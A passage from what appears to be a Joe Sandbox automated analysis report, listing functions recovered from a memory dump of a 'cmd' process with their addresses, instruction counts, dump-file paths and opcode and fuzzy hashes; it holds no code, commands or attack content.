                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a3e04505f78fff1d455cbc7a0151244b7757f4a2cd69ff17ad11147889faf9a
                                                                        • Instruction ID: f95e3f5f606805d15af638e0656a8094e71ec8d524fe1255cc96e75bd886a4c0
                                                                        • Opcode Fuzzy Hash: 7a3e04505f78fff1d455cbc7a0151244b7757f4a2cd69ff17ad11147889faf9a
                                                                        • Instruction Fuzzy Hash: 3C31E075B10655AFDB16DBA9C840BAEB7AAAF8C711F09046DE551EB341DB30DC018B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031007AF Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f820261d4aad35e1486bc88b7a48736ee902d22e759c8b2e8198834c6554e0c
                                                                        • Instruction ID: ef8c677d0060dfcb40ae5256cf60ce53253678a6e169b86903d83a244cb20e8e
                                                                        • Opcode Fuzzy Hash: 9f820261d4aad35e1486bc88b7a48736ee902d22e759c8b2e8198834c6554e0c
                                                                        • Instruction Fuzzy Hash: 3B31D136E05711DFC716EE248880BABBBA5BFCC250F06452AFD59AB290DB70DC1187E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03108550 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45d73141706700fc516168d26f2f261889774631bfd0407baab6db20b999778d
                                                                        • Instruction ID: 3d257d55c4063d219e80ee9427b9c01591e6497b7892bf11deac51578a8a938a
                                                                        • Opcode Fuzzy Hash: 45d73141706700fc516168d26f2f261889774631bfd0407baab6db20b999778d
                                                                        • Instruction Fuzzy Hash: 98318A716097018FD724CF99C840B2AF7E4FB8C700F09496EE8899B391D7B5E854CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313A6C7 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction ID: 1da6bd8390ee098c73aab29500f1953d00bc7cb6a7cb4641dd65eb2f2b43235e
                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                        • Instruction Fuzzy Hash: 62312872B00B01AFD764CF69CD81B57B7F8AF4DA50F08092DA59AC3650E731E9008B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ab752d0e13402ac190fdc3bf8f875fd701f26c70a455eaa4a6a6a7f8d905c17
                                                                        • Instruction ID: c9e1961b8fdec3a64d75f0981cdd3be4ee1f79dc8163f7d643514506a3187a2f
                                                                        • Opcode Fuzzy Hash: 0ab752d0e13402ac190fdc3bf8f875fd701f26c70a455eaa4a6a6a7f8d905c17
                                                                        • Instruction Fuzzy Hash: 9D31CC79605741CFCB10DF18C54096ABBF5FF8D219F084AAEE4989B215E330E945CFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312438F Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f90afa2894c6285e6c1a9f04973027f1837f3f884b2f9c7976ae9d6c9fb3007c
                                                                        • Instruction ID: 7273c8fa99954c27a564056560e69fcdaaa17fa314c0e6ca9e7e71f5ae2a80a4
                                                                        • Opcode Fuzzy Hash: f90afa2894c6285e6c1a9f04973027f1837f3f884b2f9c7976ae9d6c9fb3007c
                                                                        • Instruction Fuzzy Hash: 3731C232B00755DFDB24EFAAC980AAEBBFAEB88304F008529D445D7654EB30D951CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FCB7E Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction ID: 10b10c2782cc6797939a75ea4e8f1281fe7c76a5bbd84cb9d44981fd2fecf841
                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                        • Instruction Fuzzy Hash: 7D21E536E4125AABD711DBB58811BEFFBB5AF58740F098535AE25EB240E330D90087A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031BC3CD Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction ID: 294782b532e92599a51741c1b5ce0ddae4265b348ea238f08cc7c7b7a823a28a
                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                        • Instruction Fuzzy Hash: 5C21C93E600651A7CB15EB95C840AFAF7B9EF88710F40841AF996CB551E735DA50C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FC156 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84c4777c23e94278238c0a2d7177a2eb62136968925f4bce1744c3441a79672f
                                                                        • Instruction ID: dab026ccf2e61c91238a6707f32aef32213067ed114478ce1fb3513b0ee5585e
                                                                        • Opcode Fuzzy Hash: 84c4777c23e94278238c0a2d7177a2eb62136968925f4bce1744c3441a79672f
                                                                        • Instruction Fuzzy Hash: 7B3147B5501300CBC720FF28DC41BA9B7B5EF49318F5885A9EC959F385EB349982CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FE420 Relevance: .1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd24f97d971de02a28843bc8deba27b75fc7c5c9ea37bebadb4dee56fe061583
                                                                        • Instruction ID: da12a5df9ed53e8f1f4adf2a1b6b591e7a59ba4e0174769661689a4f4303f974
                                                                        • Opcode Fuzzy Hash: bd24f97d971de02a28843bc8deba27b75fc7c5c9ea37bebadb4dee56fe061583
                                                                        • Instruction Fuzzy Hash: 1831C235A0262C9FDB31DF14CC41BEEB7B9AB05740F0504A5E645AB6A0D7B4AE80CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03134588 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction ID: 952ff4c39431b452793d76d1bbd1a085c9828128dc559663930ab255181eb162
                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                        • Instruction Fuzzy Hash: 90217F76A40708EBCB15CF5AC980A8EBBB5FF4D714F1080A9ED159F241DB71EA458B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031344B0 Relevance: .1, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f2fce53d12004f790acab118bd54e6e5ca2ca8103ac179b30c4d31eea8fea70
                                                                        • Instruction ID: eeadf59ca4edf4bd4416f67997d739fff031c2bc7eaabdb48eedad192f457b7a
                                                                        • Opcode Fuzzy Hash: 4f2fce53d12004f790acab118bd54e6e5ca2ca8103ac179b30c4d31eea8fea70
                                                                        • Instruction Fuzzy Hash: 4C21BF72A047459BCB21DF19C880B6BBBE4FF8D760F094929F9559B240DF30E9418BA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FE388 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction ID: 3d392a5226a86b5eb6aa32b0f8d098f964e8907afea8defe8d8f7f6e41308b1c
                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                        • Instruction Fuzzy Hash: F7318F35601604EFD711CF68C884F6AB7F9EF89354F1449A9E651CBA90E730ED42CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317E609 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3a1c0ee2d004180a8bd07be1f65b5b4f2bae70e918b050c7ab61d23bb371ad4
                                                                        • Instruction ID: 81742e7404ee6cf269af2356fd433305f44f8cb9b8733a72602391a270874ece
                                                                        • Opcode Fuzzy Hash: b3a1c0ee2d004180a8bd07be1f65b5b4f2bae70e918b050c7ab61d23bb371ad4
                                                                        • Instruction Fuzzy Hash: E1315E75A002059FCB28DF18C4849AEB7F6FF8C304F198599F8099B391E771EA51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031806F1 Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb673167193dd0c80eb5aeaa9bb8892ad8c3ad5963e52eb5a64624a2adebf311
                                                                        • Instruction ID: f13d792f8de1549287d041309a4c970fb0b278bf3d325be5652dbcd135508c2d
                                                                        • Opcode Fuzzy Hash: cb673167193dd0c80eb5aeaa9bb8892ad8c3ad5963e52eb5a64624a2adebf311
                                                                        • Instruction Fuzzy Hash: B4218D75A00629ABCF14EF59C881ABEB7F8FF4C740B550069E541AB240E778AD51CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318019F Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb7527de9435f3b7f2f67e70f69cc8bf24a245219d9c9009c97b79f78dd52767
                                                                        • Instruction ID: ed8f0f89a6e044a924df450502a9aafe31b8cf8cd0269157a837f0c371fd85d6
                                                                        • Opcode Fuzzy Hash: fb7527de9435f3b7f2f67e70f69cc8bf24a245219d9c9009c97b79f78dd52767
                                                                        • Instruction Fuzzy Hash: BD219C75600648BFCB15EB68D840F6AB7A9FF8C750F140069F904DB690D734ED50CBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03180283 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3df64b0799c76b56c843b14549bde22b2c553efdb74d70e6cf160b164d0d1b9
                                                                        • Instruction ID: 48d584d5fa5e67a4c324b7366d2cfafd7e95429a5c2781faea38c2993b564c29
                                                                        • Opcode Fuzzy Hash: f3df64b0799c76b56c843b14549bde22b2c553efdb74d70e6cf160b164d0d1b9
                                                                        • Instruction Fuzzy Hash: 43210072904349AFC711FF59C844B9BFBDCAF8C240F08086ABC90CB250D730D908CAA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0313A30B Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 745499d8817b7134d580e002fa39a273cf00a6942c65eaac05f6a5c4a3c663de
                                                                        • Instruction ID: 86ce4bfb3bf8b5097c3d114f57c7b8187d99376f3f8113e0a465d9e90807ca74
                                                                        • Opcode Fuzzy Hash: 745499d8817b7134d580e002fa39a273cf00a6942c65eaac05f6a5c4a3c663de
                                                                        • Instruction Fuzzy Hash: 86217939200B019FCB29DF29C901B56B7F5EF4DB44F288468A559CBB61E731E852CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031BA49A Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8407656b6067aed7ae1609bc80305fdbfe80824c4113ee0f4a5fe22c99b3e347
                                                                        • Instruction ID: 7967b7d2ae3d6e17b9731535c757e957722a5e14ea4519b9c466bcbdd1651747
                                                                        • Opcode Fuzzy Hash: 8407656b6067aed7ae1609bc80305fdbfe80824c4113ee0f4a5fe22c99b3e347
                                                                        • Instruction Fuzzy Hash: E911E376280B10BFE322D6559C41FABB6F9DFCDB60F550524FA19CB280EBB0ED018695
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03180946 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54f86be60a6c4a7c102b6af401e0857eedea0e8e3e675ddceb2e94a835cd7646
                                                                        • Instruction ID: 6a5ab198aec0dceae6d1c7892cc8cc6cbc9791173a4865bd253ee4902acd0509
                                                                        • Opcode Fuzzy Hash: 54f86be60a6c4a7c102b6af401e0857eedea0e8e3e675ddceb2e94a835cd7646
                                                                        • Instruction Fuzzy Hash: 5E21D6B5E01308AFCB14DFAAD980AAEFBF9EF9C610F14012EE515A7244D7709945CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031980A8 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction ID: 99880328a25fc963cd658a09b3b6bc0d86bde776c49f849fa13044fe7e01d8bd
                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction Fuzzy Hash: CD218176A00209EFEF11DF58CC40B9EBBB9EF49350F250466F910A7250D734D9518B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03130124 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction ID: 72ab07c8f4e2bfe681e9580e67370cce3b73619bfe72398a58cb1015103f1a01
                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction Fuzzy Hash: 6E11DD76601704AFDB22DB45CC80FAABBB8EB8A754F150029E6029F190D771ED44DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03108770 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
